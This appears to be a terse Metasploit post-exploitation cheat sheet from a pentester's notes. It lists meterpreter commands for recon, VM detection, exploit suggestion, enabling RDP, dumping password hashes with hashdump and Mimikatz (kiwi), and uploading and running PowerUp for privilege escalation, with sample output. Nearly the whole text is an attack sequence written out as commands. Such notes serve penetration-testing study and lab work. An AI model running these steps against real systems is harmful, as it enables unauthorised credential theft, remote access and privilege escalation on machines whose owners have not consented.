Metasploit
# Nmap scan
db_nmap -sV [IP]
hosts
services
vulns
sessions -i [session_id]
meterpreter > getuid
meterpreter > getprivs
meterpreter > sysinfo
meterpreter > ipconfig
# VM ?
meterpreter > run post/windows/gather/checkvm
# Exploit ?
meterpreter > run post/multi/recon/local_exploit_suggester
# Enable RDP
meterpreter > run post/windows/manage/enable_rdp
meterpreter > hashdump
#Mimikatz
load kiwi
#PowerShell > PowerUp
meterpreter > upload /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
[*] uploading : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.72 KiB of 483.72 KiB (100.0%): /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
Last updated